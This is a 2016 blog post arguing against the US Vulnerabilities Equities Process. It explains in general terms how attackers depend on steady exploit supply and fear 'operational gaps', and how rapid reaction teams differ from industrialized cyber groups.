Thursday, October 27, 2016

Operational Gaps and the VEP

Operational Gaps as Hackers See Them


There's no doubt about it that if you spend your time reading the popular press you get a sense that cyber offense teams are at an unlimited advantage, like reading about Rhonda Rousey in her prime. But if you're a professional attacker then you spend your time with your paranoia dialed to 11, and for good reason. There are two ways to fail as a hacker: Be tactically insecure - for example, as this person was with transferring the Dirty Cow exploit from one box to another in the clear like a total idiot (assuming the story is true):

This is how you get caught by just some random guy. Imagine the Khrunichev's data capture capabilities on their internal infrastructure.

The other way to fail is to have a strategic insecurity, and one of the most common is having an "operational gap". The simplest way to understand how professional operators feel about hacking is that you are racing from exposure to exposure. When you SSH into a box with a stolen username and password, to take the simplest example, there is a window of time before you use a local privilege escalation to get root access so you can hide the fact that you are there by editing various files such as WTMP and UTMP.

When a bug like Dirty Cow dies, you may not have one to replace it. That means every time you SSH into a machine and it turns out to be patched you run the risk of getting caught without being able to clean up your logs. And getting caught once means your entire toolchain can get wrapped up. This is why operational gaps are so dangerous.

The good thing about being tied into everyone else is that when I fall into this crevasse I pull everyone else in with me!


In addition, machines you have implants on get upgraded all the time. Even hardware gets replaced sometimes! So you constantly have to rebuild your infrastructure - the covert network you have built on top of your target's real network is something that requires a lot of maintenance. All of that maintenance means your implants need to be ported to the very latest Windows OS, or your local exploits need to work "Even when McAfee is installed", or the HTTP Channel you are using for exfiltration needs to support the latest version of BlueCoat reputational proxy. This constant hive of activity is positively ant-like.

But imagine what would happen to an ant nest if they stopped cleaning it for just one day. That's what not having any part of your toolchain working feels like to a hacker. And add to that the traditional issues we all have with software development. Building new parts of your tool chain can be a two-year investment. In most cases, there is NO way to rush software development, and hacking is extremely sensitive to this.



Rapid Reaction Teams

That said the original form of hacker, even at the Nation State Level, was much more vertically integrated, and every nation-state maintains this kind of team. Hackers tend to cluster into small (10 or so people) groups which build their toolchains (exploits, RATs, implants, C2-infrastructure, analysis toolkits, etc.) on the fly. The important difference here is that with this model the people who BUILD the tools are the same as the people who USE the tools.

This has the advantage of very high OPSEC (toolchain entirely unique, customized to your target set), but also the disadvantage that you cannot maintain a large set of targets and none of your toolkit is tested and there's a delay sometimes between when you see something you need, and when you get it because you are not preparing for the future. That said, there's LESS of a delay because a team like this will often see something they need, then build it overnight, then deploy it the next day before the system administrators are even awake. As you can imagine, this is a very powerful way of operating right up until you screw up and knock the main mail server off the network because your untested kernel implant doesn't cooperate with whatever RAID drivers your target happens to have installed.

In the nation-state area your Rapid Reaction Team is most often specialized in going after your really hard targets, but every penetration testing company also works like this. Not only that, but most penetration testing companies have a large pile of 0day that they've found on engagements that they just frankly can't be bothered sending to vendors. Sometimes these get written up for conference talks, but usually not.

And of course, the reason you see people go on and on about Cyber Letters of Marque is that that many nation states lean on a collection of private rapid reaction forces for the majority of their capability. Without the US setting norms in this area that we're comfortable with, we're not talking apples to apples with our counterparts.

Capabilities, Costs, and Countermeasures



The difficulty in policy is that we get a lot of our understanding of how "painful" a regulation is or how effective a countermeasure is or how much a particular capability will cost to build from public, unclassified, sources. These sources are either looking at hackers who have gotten caught (aka, FANCY BEAR!), or talking to open source information people who have a lot of experience with penetration testing companies, but not necessarily the hybrid Rapid Reaction Force and Industrialized Cyber Group way the modern IC (in any country) works.

Using Exploits against the BORG


Hackers have ALWAYS assumed that defensive tools worked, even when they didn't.
Aside from the obvious fact that despite the optimism you see in policy papers that support the VEP, not all targets are soft targets. We build our Intelligence Community efforts so they can tackle very very hard targets in addition to having a high level of reliability against a medium-sized business that happens to sell submarine parts to the Iranians.

But the VEP-supporters assume every company is penetrated the same way, and that our ability to do so will last into perpetuity. The Schwartz-Knake paper on the subject throws a fig leaf over the problem of exploit scarcity by just saying "We'll increase the budgets a bit to handle this".

This post tries to get policy makers into the basic paranoid operational mindset a hacker lives in day in and day out, to counteract the perception of super-powers the media likes to portray us in. Without going into the details of how hacking is done, it's easy to over-simplify these issues. The result is the VEP. Codifying it into law or an executive order or expanding its reach would be a massive mistake.

----

Updates:
Ever heard of this company? No? Well I can guarantee they have enough 0day to own the whole Internet. Comforting thoughts!

Chris Rohlf is well known in the industry but it's worth noting that NOBODY in the technical community thinks VEP is at all workable. Who did they run this idea through before implementing it?

1 comment: